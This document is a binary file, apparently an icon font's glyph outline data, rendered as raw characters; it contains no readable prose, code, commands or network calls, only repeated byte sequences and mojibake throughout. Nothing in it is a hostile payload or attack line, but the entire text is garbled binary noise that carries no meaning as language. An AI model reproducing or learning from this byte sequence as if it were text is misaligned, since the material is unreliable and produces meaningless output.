���vy����"!#"3267>5.#!"!'32654&#!";1.#"32>7!#"3267>5.+32>54.%#.'!7".54>327!#!".54673267>'>32#�.V%�3-		&:	��Z�c�		��		Jmb"K)E{[55[{ECwZ6c.		':	~�w4%5[{EE{[55[{�^���)9"}��>L��?oR00Ro?$D�22Rk<`?oR0E9��!M)?oR00Ro?`N$		 E	��				��5[{EE{[52VuC#		 B��<EO*E{[55[{EE{[5��N��T+OF:���'��v0Ro??oR0��=iN,0Ro?L�*��
0Ro??oR0����*3Kb4&'.#!"#&3!26=4&#>5!5463!2!.#"#"&/.54673267>32#".'�!��  6^�K�$	�
%}K\4��� �9.,LY%$PFEP$,!R@LY%$PF,7XuC<jT<
�6�..�6G�uL��$		&Lu�G��)v/$!!

/|*��$!@f?3Tl9����&7GWhx��4.#"02183326720183>5!.54632!.54674&'>%467.5>54&'";26=4&#+"&=3�7p�qq�p7��������),

,)W))W�� %!RG1^a @ a^1GR!% ��ad32"6B!.dS6%!B6"23da6Sd��	`		`	��LqK%%KqLW��``��WC�~ff~�C�XX�9wpb%"bqy9q�"�``�"�q9yqb"%bpw9_z$zV2hc\&%[eh2��&\ch2Vz$z_2he[�	``	p		P���'7A�2>54.#"2#".54>"3!26=4&#!5463!2'01326=041>72764/&"#"&'.546764/&"�E{[55[{EFz[55[zF?nS00Sn??oR00RoQ$	�
% �� 
�	
M�9&0
9�PP�99<<91%+ /CJP)5[{EE{[55[{EE{[5�0Ro??oR00Ro??oR0��%0		.&B �3		3;4%19<<99�PP�9
1&EJP)+TMG- ����6Bfr~���������	738126732673812676&'>'.#".#".#""&'>7467>7>7.'.'..'>77>77>7.'.>54&'.'>7>7.'#"&'>7>72.'.'>%2.'>>32.7#81"&'&672654&#"72#"&546S=<]88]<=S-JJ-S=<]88]<=S-JJ-�,M$K%%K$M�-00--00-22(<$"�<"$�22'<$"��$<"5F37	%?=3�3F3=?%	7��,M$K%%K$M�zF37	%?=3[?%	73F3=W!//!!//!�!"]nn]"!*�OO�*!"]nn]"!*�OO�*�aR		Ra�66668**))� <	
F< 
�**))� <	
+
	< 9"L)4@s�%s@4)L"�aR		Ra�"L)4@s%��4)L"%s@8/!!//!!/����.:F"3267>54.#.54>32"32654&"&54632�O�i<p�vv�q<i�Oty]7`�II�`7]ytOqqOOqqOB^^BB^^�=h�Pw�nm��yP�h=�%t��fI�_88_�IhȤrqOOqqOOq��^BB^^BB^���*6BNZfr~��"0212676&''.7>3#%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"54&+"021812>'"&'.54>313B]]BB]^C5KK55KK4�



�



� 







��



�







�@



�	�4]F(&$$]34]F(�-R!$>R.�$=Q`]AC^]AC^��K55JK55J�






�


�3


3


�3


�


�3


Q�	(E\44^$%'(E\�#  R-.Q<#�.Q<#	��@�@d�������&.'.##"&'&3267>7:3267>=>54&'4.#"3267>732>"&'"54&'.54>32#"32654&"&546327"32654&"&54632%"32654&"&54632u^WW"7>\-
1fC
-T>Bc�O��oqS#7E!�FCq��I� D1g A6"N��jh��KD}�j&&&&


�&&&&


�3&&&&


�]F>]z !
$/�,g5Qm2\�tBCt�[7]N?�LM	:i���
8F�:IW3T�l>=k�VS�a5�&&&&`



`&&&&`



]&%%&`



����0Z".'.#"3267>7>54.#.'.54>3227>7>32`;o--o;BuW2/!/��mm��/!/2WuB�*��qq��*=7-Oh<5d(!!(d5<hO-7=�+(##(+2WuB-QLJ&8�rNNr�8&JLQ-BuW2��1tkSSkt1H�S<hO-'$++$'-Oh<S�H��@�S.#"3!2>54.!".54>;2654&+">32326=81?<m�e]�wG3N5/Oh::iO..J\L�3]F* @`@0		0;i�`g�b0		$OB+)F] P�uFAs�\BQZ'=nT19Xl3>lQ2��,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3��@�y.#";2654&+".54>;2654&+">32326=81+"&5326764/&"2?;2>54.?<m�e]�wG3N5/Oh:�		�3]F* @`@0		0;i�`g�b0		$OB+)F]4�NB���
�U[�:iO..J\ P�uFAs�\BQZ'=nT1		,Kc6%^S:		G�nCJv�K0		0)Ga;.`O3BN������I[U9Xl3>lQ2��@�}.#"7>32326=85#!".54>;2654&+54632'&"326?64'&"4.#"3!2>54.'?;m�e0-g�b0		%OB*(E]6�0\H,?`B0		0gYQo�
�

�
�#<R/3S: ?`@!%IlF=iM-1L[)!O�tFJv�K0		0#CdC9dI*#DfC1aN0		@YhpQ�`|
��
|�/S<# :T3B8Sh57mV6/Ro@LpK'��;�Y����&"&#76&'&#76&'&#4.#"32>733267>/33267>/3633267>/76&'".54>32#4.#"32>734.#"32>73#".54>32##.#"32673#".54>32#3#"&54632#&9L-9K39KQ��jj��QQ��jf��UK93K9-LGG��c��LL��cc��L`=h�OO�i<<i�OK�fA`P���)E]55]F((F]51WC,`<]zEI�`77`�II�_8`�J55KK5,Db';K*.R=##=R..R<$`pJ
1(88('8P

[E[E[j��PQ��jj��QK��d[E[E[UU��L��cc��LK��cP�h<<i�OO�i<6_�J^�yF�5]F((F]55]F("=R/CuW17`�II�`77`�I5KK55K6*)F4#=R..R=##=Q/ $8((88(

�����'U[ch2>54.#"2#".54>32673267>54&!6&'."!&!>2.'j��QQ��jj��QQ��jc��KK��cc��KK��]��/H1
���,bdb,���
1H/RJ�@���&QTQ&��JRAQ��jj��QQ��jj��Q�K��cc��KK��cc��K����DQ[2
6��
2[QD-Q�/X��%����/�Q���+;B4&#!4&#"32>%4>73!#".5%!2654.#"!�	�P	`�~IG|�d\��K��Aq�W	�Hv�T]�tB�	I~�`		U�pC�`�	�	I~�_d�|GK��^W�tG�O	T�rCBt�]O	`�~I	�?	�Dp�U
�����(6DRcu������"32>54.#".54>3226=4&#"#";2654&;2654&+"%26764/&"&"326764/64'&"326?326?64'&"#&736=4&#.54673'267>'764'&"&3'>32"'&47j��QQ��jj��QQ��jc��LL��cc��LL��S��@@�@@��22�00 33��00W����UU=		

$

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K@@���33��00�22�J00RP�
<UUF
s$$���%/:JTboy�������������32>7465<'4654.#".'>7373.'>7>32#"..'>73267!467.#".'>774&'>7'.'#"&'>32.'>7#467.'.'3>7.'>74&'>7.'%.'>#46T��gg��TQ��jj��QD#�3,%'�-::	""(Bl!@!(4<<��<<!@!lB(
#D�(Bl!@@::	""�!@!lB(�D#D'%,,$D*=h(*D$(h=�').j$D*=h�	*D$(h�'�.�g��MM��gj��QQ��j�#H$1]�C{5
,c5�@gI''Ig�vT
T�(~'T..T'�%D 'D�
Tv(�T�,X+1m:�T�(vT

@gI''Ig:
Tv(�t+X,:m1�$H#
*]1�
5{C5ct
<a"L2�"a<
2L�>s3
;�M,
<a"Lc"a<
2L�
3s>M����';p����32>54.#"2#".54>2>54.#"326=2#";#54&#".532654&+>726?32654&'76&'..#"374632#"&7.'7Q��jj��QQ��jj��Qc��LL��cc��LL��cV�qAAq�VV�qAAq�6		K�g@0		2<i�O		J�_72		0;^zF��(8��	(8��&&&&�@
Y�V�j��QQ��jj��QQ��vL��cc��LL��cc��L��Aq�VV�qAAq�VV�qA0		27_�J		O�i<2		0@g�K		Fz^;���8(��8(	��&&%%�Y@�
=C���}!3D���+@Tbv����326?64'&"326?64'&"&"326764/326764/&"326781>7>7>7>781>4&'.'.'.'.'."8181>762818181818181"'"&'.'.'.'&47>78181>7>7'>7645.'&47.'.'7.'.'7:7>7"%'>7>7.'.'7'.'&"'62>7'>7>7>"&'&3267>'.3267>'.4676&'&>4&'.3267>232676&'."7�_^�^_
@
XX�XX-"5&P))P&
	2%	'.
&PRP&

2%2	
������T 
�

J0�J		J?�U.	J


�!$
�

J
*yJ
		J?��	J

�!.�7x|x7
:�BB�:
�P!""!  
z!""!
  �V7x|x7:���:
g_^
�#^
^�XX�"
X
X�	
&PRP&
.'%2	
&PRP&5"%11
		


?�@J		ZJ?�@J		
�*
J

�#Y��p!�

J	. 0J

�
 G��-�

J	.!�  
"!!"
�:���:
7x|x7
�:���:
7x|x7
�  
"!!"
���'=IUamy���2>54.#"2#".54>326764/54&#"%32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"32654&#"j��QQ��jj��QQ��jc��LL��cc��LL����		�{







��







�







 



��



@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�g
��

�






s


��


s


��


�


��


����2>54.#"3267>'.'.'.'&67>7>323267>7>7>7>7263.'.'.30216>'.'.'.'.#"&'>7>7>7>76&'&"#.'3:3>5.&'.'.'.'>7j��QQ��jj��QQ���


2o<9l0;p2%C(&@"6v@/N9#&[4&R+'N&		$J%)N$7_( 8L/



2o<9l0;p2%C(
&@"6v@/N9#&[4&R+"C!	$J%)N$7_( 8L/@Q��jj��QQ��jj��Q�9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L					R5;naR9u<+V*!=	
	;(Q)?{=( 8!6	
	45!)	P`m;/L				R5;naR���'c�2>54.#"2#".54>67>'.'.'.7>763267>54&'.!67>'.'.'.7>763267>54&'.j��QQ��jj��QQ��jc��LL��cc��LL��F


	#=:#4"7



	#=:#4"7
@Q��jj��QQ��jj��Q�L��cc��LL��cc��L�k
			9.D�=KP$5G


			9.D�=KP$5G

���Th4&#"!"3!3265!2654&#!!#.'54&#""#";3326=>532654&#".54>32 		��		0		/		���T@f�L		R�pEP		NAq�V		P�g<R		�O�i<<i�OO�i<<i��		��		��		/		L�f@R		P<g�P		V�qAP		REp�R		�`<i�OO�i<<i�OO�i<����'A[q��"32>54.".54>32"326=4>;2654&#!#";2326=4.54&#"326764'76&'&3267%.3267>'�]�yGGy�]]�yGGy�]V�qAAq�VV�qAAq���2WA&		!8L+		�		+L8!		&AW��		���`
`
`�Gy�]]�yGGy�]]�yG��Aq�VV�qAAq�VV�qA�&AW2"		"+L8!				!8L+"		"2WA&���

��
���
�
�
�
�����;{32654&+"326=&'&32>7>54.'"'.54>7>676&'.#";26781>=4&#T�		�			"4$$4"3{��B.]/2b]T%$8&&8$�f	"4$$4"2y��BF���4%8&&8%�		�	@			�		�"NV]00]VN"3B&8%$T\c33c\T$��	�"NW\00]VO"1B	
F5$T\b43c\S%		�	�����(4@LXq"32>54.#".54>322654&#"72#"&5462654&#"72#"&546#"&'.326764'&"j��QQ��jj��QQ��jc��LL��cc��LL����&&&&


m&&&&


7(o;=p(.}DB|-�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�&&&&`



`&&&&`



��,12-3761�����(DP\ht"32>54.#".54>32"67>32326764'.#'2654&#"72#"&5462654&#"72#"&546j��QQ��jj��QQ��jc��LL��cc��LL��^C{.)n<=o).}D�&&&&


m&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��Ke71,01-38j&&&&`



`&&&&`



�����(X"32>54.#".54>32#&#&73736'536'56&#5>3627>'56&'";#"#54&+53267>=46;j��QQ��jj��QQ��jc��LL��cc��LL��
UR)0

0
b	P

P9
(&NN
A	00!:D�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�U75
`
�

�
`
0`
^"=>
��
>E64=�����(|�"32>54.#".54>32>76&'..#".'.#"""1'&32>5<5>764'.#"&'>7>'.#"&'267>54&'.'>76&'.5467267>'.546327>77263j��QQ��jj��QQ��jc��LL��cc��LL���
+2H5`"		%8
&W-JuR+

7'HiB.1	$#

*m;4$!
�Q��jj��QQ��jj��Q� K��cc��KK��cc��K~
H24+
	0	'

	7Yr:94eP1

	!'+1
$4
�����'fs�"32>54.".54>324&+*#*#"3267.#"32654&'.'.'&65>5>54&'3265"&54632#"&54632%#54&#"#&73326=3654&j��QQ��jj��QQ��jc��KK��cc��KK��"
�5LL5	
B]]BB^
3
�4II44JJ4'88''88cK
	N

N
K

�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�
@..@	E11EE1,/'
�11##11##1&----[L
	P

L

L

�����'@Wdp"32>54.".54>32"3232654&'.#5"3232654.#"32654&#"&54632j��QQ��jj��QQ��jc��KK��cc��KK����

6Y !

&$%e=

V�l=

Bu�]0&&&&


�Q��jj��QQ��jj��Q� K��cc��KK��cc��K!

   Y6

=e%%&�

<k�U

\�tA��&&&&`

�����'w�"32>54.".54>32#56&+"7&3267>7>'56&'&"#"&'.'.5&4=36'56&#&3267#"&'.'./.'56&+5>7>7>7373j��QQ��jj��QQ��jc��KK��cc��KK��-p
S
	
0
o

o




/	3
o�Q��jj��QQ��jj��Q� K��cc��KK��cc��K_p
	W
 �,
		MN
`
a
^%

�
:

o
@�����(GS_os��".#&;26=067>32;26'56&##54&#"#36?>32"32654&"&54632#";2654&#3"32>54.".54>32p
	`		`

	
d
`3qB"	
A>		]�&&&&


!_

_

@@�j��QQ��jj��QQ��jc��KK��cc��KK��B
��		�
�		�SD���!
	�?
	
#Q�&&&&`



?��		`
��?�Q��jj��QQ��jj��Q� K��cc��KK��cc��K	�����'I��q��"32>54.".54>32.#"3267>781>54&'.'.'"&'"&#*#*"#".'.'.'>7>7>7>7>7>7>7>7>7>7>7263>7'2""#4&5.'"4'.'.'.'.'.'"4#>010"#'"&#"&'>7<5233232381263263>7>3>7>3.5461>7>7>7>7>7>7>7>7467>7>7>7>7>3&7.'<#.'267263623:3223j��QQ��jj��QQ��jc��KK��cc��KK��X%`61BU2-"T,64J$" 	
		
	
�+O	


	 P		
8	@1~
	

			

"$a



	4n�	
		



2"�Q��jj��QQ��jj��Q� K��cc��KK��cc��K�'*
	rG:i%W7"1[$�F%
�

		
		5U�
	 T.�!%=k=�c`�"32654&"&54632%'764/&"'.+"'&"2?;26?2?64/7>=4&''.#'4&'&'7>'./572676&/77>5736?3�B^^BB^^B6MM66MMP]:�J�J�9\\9�J�J�:]jBwT
�
TwAiiAwT�
TwAjp^BB^^BB^��M66MM66M�J�9\\9�J�J�:]]:�J��
TwAiiAwT
�TwAiiAwT�	�Im!^n�������64'&.#"6&'&"32673267>'32673267>76&'.'>54&'3267%624&'&47'.'&67>32%&'&67>32#".54>32'.'>762%"32>54.#".54>32'54&#"326764/`(()s) D%$E(t())
$3

D#$C	 2$�v!\!5S!!�

x


l3WtCBuW22WuBCtW3S5!]!  ��6_G**G_66`G))G`60V@%%@V01U@%%@U#NJP(s))((()s( D$+OG<	





	<GO+$E�!!T5 ]!�q
	
	

8CuW22WuCBuW22Wu[5T!!!] f)G`66_G**G_66`G)�%@V01U@%%@U10V@%��OJ�8o|���.#!'.'.'./.'#.'#"&+";1!'>?>'##81'!"&/#'0&/#"&546;2322!21"32654&#"&54632%"32654&"&54632��t�$%X$X�j5e
�{
f
.o�*�
�#$33$$33$!!  $33$$33$  !!�
E%%M�#�Sj�		�dZ
5��3$$33$$3�!!!!�3$$33$$3�!!!!��42'+0=FZht}2654&#"352"5463%!"3!2654&#!5!!2654&#"352"546&"326?'#";2654&2654&#"72"546�


4����i��3

�
JGX[�PP/



�

%U��������8


'�
HG
XY�


'lA��,CGKVafj|���%!"&5463!2#!"3!2654&#"&54632#5!32+!#"&546;%#33#7627764'&"3#53#"&/&4762#"&/&4762#"&/&4762#"&'&4?62#��3**f

���

**���

�$

G�{��kHH/B<���NJ<

���llll�LLfLL�LL�$$A**

��

*��*H
�.�
��$�R���C;��/�J<


��A$$�$�LLeLL�LMG$$��{16;@��������"0010;26?0&5061463>7>54.##'37#'37#'37#54632654&#""&#.#81"381812#.'.'.54>3226=4&#"3326764/&"4&+";26326?64'&"&"326764/7#";2654&#'26?64'&"3/1U@%/+'q'+0%@V0-Z`	ms
�
�
;C				
C'+ 8K+*K8 +'v				�FF>	c		c	>GF�FF�c		c		�FG�%@V07`"��"`70V@%�{,,;;�"�							
�"U1*K8  8K*1U�	c		c	SFF�				�FFFG�				�FF	U,��'+0<FR\2654&#"352"5463%!"3!2654&#!5!!2654&#"72"54632654&#"72"5463���		>		�������1n	��		>	����O���333 } ;t��"32654&'>54.#2.'.54>3#"&54670317067467>7>7>7>7>74&#"3265!4632#"&53ZC'1<DR�ba�RD<1&CZ3,N;"%6==6%";N-�nVWnH@
@H*[?@[[@?[��H32II23H}'CZ3$bmr46"-==-#54rna$3ZC' ":N-%jtp+!!+ptj%-N:"�-00)		
		)�@ZZ@@ZZ@3HH33HH3 E�&
)Zf��%26=4&#"#26=4&#"#26=4&#"#'.#"#76&'.#"#"3!267>=4&##!"&5!#!"&=46;7>!'&6763226=4&#"�qpʙN,�-O�+#7++7&,Q��6�6w���YPfOY�����������~
,FG,+*/��*+</*+�:���*�||�*�����k|�%Khv����!546;267>'.=4632;2%!54&+"&'.7>=4&#"+"!"&'.=+"&5463!2#%!5!37>"&=4632#"&=4632#"&=4632#"&54632|�`'�;)*;�'��]�
((�L�\#T

;

�m���9>
P



J



J

	
9x�(	+*;;*+(�"d
%''$
d��?G

		��
"��}
u"
�

�

�

�

T

T
���wUjt~26?>54&/.+54&#"#";#";32654&'532676&/7>'.+53#"&5467326=!'7!%764/!!�__�		�TT�__�@XaFGaX@�TT�L=<MD6	7COEE��PPo�QDDoOO��|_^			TT	 _
_�3$'55'$3�	TT	 ��''%<<%E
EPO\EDOP:Y\�)BO.'>54&'.#"3267326764/'#"&'.5467>32%34>35"_(,/,-r?>r-,//,-r><m,��$(h98h((++((h89h((++(�K!8L*0VA%o+m<?r,-//-,r??r,,0,)��)++)(g99h((++((h99g(�+K9 %@V1
��#�&7;JZjv�%"32654&"&5463232654&+"3!"3!2654&#!!'32654&+"3%!"3!2654&#!"&5463!22654&#"72#"&546

1//�e

���w�~~	"�:%%�&&�:��}uN



&P
��

Q
��-G		�%��&&R%�nRX&P�_
)Ll!"3!2654&'!"3!2654&'!"3!2654&7!":1!3:7>=3021>54&##*1#"'.#!0"#"&5463!2�b		�		�b		�		�b		�		��*'&��X&'$f	��c��				h				g	

	�(��'��'(��	����S���@DQim4&'<'4"1.'"&#0"1!"01"#8813!267201647465
0"1/0"1%!22320120126162?!%7%%���=��&���GC���֘GG!�!�&����� ����75�� 77���9�&h�E
!HSXj!"3!2654&!"3!2654&!!#4&#!"#"833!26?>7>54&#463!2!!'!7!"&'.5463!2#���Rt��

;

���6�Q:CI
����:�!F(D��xH�	��

h	��H�K��
SI
�

���v((IZ�! ;S..1270>7>4&"'.467>7>2#1"1#"&514638�+mro--orm+----
qePm�o---Z��

��$##$"UZX$++$XZU####��		+=		P8+,((((,+-ptp-q}dl�n-ptp����		^#Y\X#"#!''!#"#X\Y		=+		8P@ &O.#".#"31!2>54.1!"&5467>'.5463067>32#=0Mc8+PC6
<T.:!8L+@2WA&4GW��<T&"!	
/!
nA+M<%$>QgI7_G(,=%T<^:+L8!&AW2,N?*�mT<&B"!/;G6J,"b?Ig����.K.'%'.#"326?3267>'7>''.#"6&/%>?� ��t	$$	t�� 
�-
		��		
-�
��-�				�-�
tt
�.'��''��&}}&�'�!��}}!�(��(�
% �@"6i}������.#"3267>7>4&'.'"&'.467>2.'.#"32654&'>7>7>4&'"&'.467>22654&#"72#"&5462+"&546372+"&546372+"&5463%6#"&57>?�A�AA�A		A�AA�A	

	@�@@�@5iii54iji42e3�]]�3e3>g���hh���g_		

&		`

�		`

`		`

��		x
	
��

5jji5

5jij5�N



2eed3



3ded�		M���M	

	M���M��

J���J

J���]@				��				`				`				�		
=		Y
���=T_s�4.#1"&5463021281#"&51.#"326?!2676&'#"&/.546?4210#7">5!%+5467>32"&5463021281#"&514.#1`-Oi;		BtW2		��#		 d�$$d�1�@�c

�d
.�����

�*	���

\�zF

=h�O;iO-		3VuB		�1�HdP�d 9���d�
c����W	�

�@	�

Gy�]

O�h=` !19#"54&#!"3!26=;2654&"&5463!2#%#'5'573�
	W8(��(88(`(8W	
&&��

`

 � � 
V((88(�(88('U	
&%��


�
� ��
@����%/9DTYin~�.+54&#!"#"#313!26526=#%463!2!#!"&5!7!5463!232654&+"3#32654&+"3#32654&+"3#�7&`8(��(8`&7&K55K&��
@
��&�&�@�
�
��@

@

@@�@

@

@@�@

@

@@�%5 (88( 4&F%��5KK5 %Fz

 �%% ` @

�`
�

�`
��`��@
�

�`
��`��@
�

�`
��`�����-FY%.'>7>.'.#"3!2676&'%"/.7>32>?3267�,NkA0=
	*$*tEEt*$*	
=0AkN,"�"��9�9
"1	$>X::X>$	1��(Hd=O..O<dG*5$(<�6&isr.6785.rsi&6�<($((�
BB
+ahl53eO11Oe35mga�!%

$"���-Zx�";26?326=326=732>54.#"&'#"#"#5817.54>32#.'.7>7>54&.'>7�BuW2�{
&`
.K%@%L:BuW22WuB#Ba	
@&K
	-[u/(F]55]F((F]5�A&!.A&!.c#>	##>	#�2WuB:�{
`&
.&@&KL2WuBBuW2��a	
K%@
	-[u/B#5]F((F]55]F(8&A-!
%A.!	T=##	>##	���!1EY"13267132>54.#"&54675%".54>322#"#"&54>�P�i<��B/)([1P�i<<i���"
(���BuW22WuBBuW22WuB		Pp		#=R�=h�O1Z)��*/B<h�PO�h=�J
!(���2WuBBuW22WuBBuW2 
	qO		.R=#���l��
'.'76&/.#"./.+"'.#"326?;26?>7326?>/>?>=4&''.#"#'.'.'.#"'7>'.'./57>7>76&/73267>7>?3326?"32>54.".54>32"32654&"&54632�c	8
>		T
$W$
S			>8	cc	8>			S
$X$
T		>
8	co	8>S
	X	
S>8	bb	8>S
	W	
S>8	bb��.R=##=R..R=##=R.)G55G))G55G)5KK55KK5(88((88*
S.>	
8	bb	8
	>.S

$W$
T->	
8	cc	8
	>-T
$W$�	"S>8bb8>S"	W	!S>8bb8>S!	W#=R..R=##=R..R=#�\5G))G55G))G5DK55KK55K�8((88((8`3Mg"32>54.'.7>'2#"1#"&5146%/.#!"3!2654&#!"&546?>3!25]F((F]55]F((F]]4�<<34�<<
�		(8		K�,0��0,�#-8(@(8-
��
�9
@
9��(F]55]F((F]55]F(��<
44�<<34��		8(		5K�n!!n6#� (88(�#6��

��		�@�@'3?.#!"3!26764#!"&5463!2'"32654&"&54632�:!��5KK5`!:�J�	��&&`	�
�(88((88(%%&& K5�5K JG�%&�%s8((88((8�%&&%�����4=Xk54.#"";2>=4&%4>32#54&#"#%!54632+".=463:3!:322#"&'.5463 -Ni<<iN-(8-Ni<�<iN-8��#=R..R=#@^BB^@`�K55K�#=R.�.R=#
 � 
��&

& �<iN--Ni<�8(�<iN--Ni<�(8�.R=##=R.��B^^B����5KK���.R=##=R.�

`%11%���`�'/6M_"3267>54..'0417'.'3"&'7!.'.54>322#"#"&546I�`7&560*ef)074&7`�
�	��
�q
�z��6-Oh<<hO-6�		B^		q�7`�I0cb`-����-`bc0I�`7��@	�
( 48p1<hO--Oh<0q83�		^B		Oq����&6EM_t�.#"01"93261%>7>.'.'81<''.'.''.#7>#"&5465767.'.'7>7646'.'.#7>32�(c4+M���KB.	�")&�S
/�'	
!1"
�Ή.�M)�"9w�>! 0�46*vz6*#'c456'L!m(+�����.BG�!V\Z&�Z*.,V�q
1
��v	
�
�(z9( @s#37�/6.W#'+6!E$";@@#(,/258;>BEIMQ'.#!"3267>54&#7?#'73;7'3'3'3#33!37'7%#�	
��
	�
	�		�
�Q�GWAQ�QAWG�PP� ��WOArp=�G���=p1O��N���qfq���WJ��JW���	

	�		�#�	!;IACCAI;5�q��w�AA�3	<33_A �w���P��P V=��=V���5E!"3!2654&!!7!"3!3!2654&/5!2654&#!"&5463!2`�@

�

�@�@��(88(@�

@

�@(88
��

@
 
�@

�
� ��8(��(8'

'8(�(8� 

�

�����4O2654&#"2#"&5467"3021265>54.#0&'.54>32OqqOOqqOB^^BB^^BO�i<@cu45tc@<i�K,m`B2WuBBuW2B`n,�qOPppPOq`^BB^^BB^�<h�PT���<<���TP�h<�D2���NBuW22WuBN���3�CXn��<'40'045.#""1"00132>7<16056454654&".'>32#2#1"#"&54638'"32>54."&54632�#l��PP��k##k��PP��l#�D�ta !`t�DC�t`!!`t�C

(8
	K5.R=##=R..R=##=R.OqqOOqq�CpQ--QpCBpQ..QoC��%C_9:^C%%C^::^C%�		8(

5K`#=R..R=##=R..R=#�`qOOqqOOq�Dm2#"#"&54>7"081326>732>54.#"&'*#">7<54&'.54>32		@tX4		8aHj��P ;S20&F;)2j��PP��j-	
6#	
,F1Gy�]]�yGGy��		5F&		.Q=$�<i�P2\QE+T$*(
<i�PP�i<�@
00:CK&BuW22WuBBuW2�#DS.#!"3!26=4&#!"&=!!";;26?3267>'.##"#'.+!��#��#�K55K?&�&����n�.	�	.�n5/�/�]�]q��	�5KK5�	�&&�� �
��]]�
��]]`��@����'+/48<'.#!";3!2674&5326=4&%!!'!7!!!'!7!5!�'!��!'#&!@%�%@!&#�C@ ��`��$$$$'��@`�uu%`&��!!@&`$b`��``�@��``@`���`�'7G!"3!2654&#!"&=!5!!5!5463!2+"&5146;2+"&5146;2�(88((88
�
@��@��

�	`		`	 	 		 	�8(��(88(@(8�`

@ � @

				��

		���0>LZhv��������!"#"3!2654&#!"&546;3265463!2"&5463!2#%"&5463!2#%"&5463!2#2#!"&5463%2#!"&5463%2#!"&54632#!"&5463%2#!"&5463%2#!"&5463%2#!"&5463!2#!"&54637326=4&+"73#��@(8 (8K55K8&�&
 


�
��				�				�				��		�				�				�		`		�				�				�				��		`		��		�

�
-���8(@8(��5KK5 (8��&&�
��



��	

	`	

	`	

	��
		
`
		
`
		
�
		
`
		
`
		
�
		
`
		
�
�

�
�� $'7!"3!2654&#!"&57326?'7#"&'463!2��5KK55KK�����&�&��

����f

�f&&�f K5�`5KK5�5K���P��&&�i	

	i�����3&&�����Sc���.'>54.#".+";267:13021;267267>'>76&'>76&'>?<54&'+"&546;2#*1"30232#*1"30232#*1"302321+"&#.'0&5467>7>546322"32654&"&54632��g-8'8.Q
!`(88(`-;9pC�(9			

,/�;
`

`
�*$		$$)($		,)3#		
�Bnd*7I,E
�U��				q/$+N<#8'1�*8(�(8
0++ '%B��



1#		-3		/&		$	



�FQX)Y?94;"��@				 ����/CIO[g!"3!2654&#!"&5463!2#!"3!2654&'.#".#"!7!'7#2654&#"72#"&546`�@5KK5�5KK&�@&&�&`��

�

hS�h����X�nV�hX(88((88(&&&&�K5�5KK55K��&&&&
��

@
 �Dq^x�͓��f
��a�T@8((88((8�&&&&���&.<JXft����'.#!"3!2654&#!"&5463!1;'#"&515%"&546;2#"&546;2#463!2#!"&2#!"&54632#!"&54632#!"&54632#!"&54637326=4&+"73#�	
�`(88(@(8
6
��

�8(�` %��0		�		�		�		�	�		��	�		� 		�		� 		�		� 		�		� 		�

�
-���	
8(�(88(`
�|


�(8 &�� 				`				P				�				`				`				 				@
�

�
�������#/;GS~����4632#"&4632#"&'4632#"&%4632#"&4632#"&4632#"&4632#"&7"#./.#!"3!26?>7232654&#!.#"!'3267'".54>32#"&'.546?62�







�



�



��









�	&.$�#,)/-'-$$.(	&&�C #Q,,P$� #Q,,Q#�5]F((F]55]F((F]iN;��


��


�






{



��
�*J��+o@>m+�� L+&%���,�(F]55]F((F]55]F(�aG����'.4;.#"38126?3267>76&'	./81	%.'�	�@�v	C6��s����^�����
�����		d�	n|�	�l�Mi���m�����)7����/KYg�54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>328181%54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281814&#"326=>54&4632.#"#"&=326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281818((8##8((8##�

@

<


	


	�8((8##8((8##�

@

<


		

	��8((8##8((8##�

@

<


	


	�a(88(aB''B�(88(�B''Bw

C�

��





�a(88(aB''B�(88(�B''Bw

C�

��





��(88(�B''Ba(88(aB''B�

�=��

C�





����1F��3V	.7>7>7>7>7>7>76&.'>7.'.".'>3267>74&'.'&".'.#"7>7"'.'.'.#"267>73267>5.'.'>7>76&'.'&'.'.7467>7#.'>7>7:620"1"'.717>7>71>?4676211&'&47467>7� 	&%^36m.'6
@ 	&%^36m.'6��(PPP("���"(PPP("���"�	



	!
			�
	�




u



m@		#>%<E.(X2#��		#>%<E.(X2#��(PPP(n}j}n(PPP(n}j}n�	
			


	 					
A�



�


@����+Ig{���"32>54.#".=32>75101#".5049532>75101#".5049532>7".54>324632#"&54632#"&54632#"&Q��OO��QQ��OO��/<i�PP�i<Qfu;;ufQ<i�PP�i<Qfu;;ufQ<i�PP�i<Wen77neW��P�i<<i�PP�i<<i��











�3N6��6N33N6`6N3��4''4x'

'H4''4x'

'H4''4n##'44''44'� 


�


�


	���GS_c.#*.#"3267>7>53:7%.#"3267>7>534&'&'&676%&'&6765%�	��>#(.F`>(.F>#(.F
_>).F�
9h;:9h;%:g;:9h;1�� �`$��:&>1:;&"^�|:&>1:;&"�	�Y +*W!**WM +*W!**W�```���DR`t��"'#!"32;26=4&=405>7063>78181>7332>54.#46732+.%46;#"&#4&'313#1"&546;267.#"&'32654&+>32 1N(tB��6JJ6&%�& =i&M17T88T7�[&&[��&��&@�	`'&&-U%%U-y0NQ6JJ6QN0!:,,:�?4O_]CC]&��%% 
�\J4>M�SS�M�@08((80(8228�( !�
�8((8"'Q))Q'"��}c]CC]c}<i�PP�i<�!1M[g4&'%.#"32>57>#"&53267%%"#*'%.5467%623:4632#"&52#"&546* �_�` ** V&U�``�U&V *���
���`��



 &&%%�"4``4""4�� :,,: 4��EE>>```�

��

@f&&f���/Gbnz������.#"3021267>7326?>54&'"#"&'.7>?"/7.'.'%'&4?622654&#"72#"&546"32654&"&5463232654&#"72#"&5464632#"&4632#"&�.�M�!
%	�
-���h
�2eed2�K.
9.H�B)7-
���!//!!//!�!//!!//!�<&&&&@


M







I.	�
%-�m
�
-���P	.6���-9s
H'm6
-�
�/!!//!!/� /!!//!!/��`&&&&



�


�



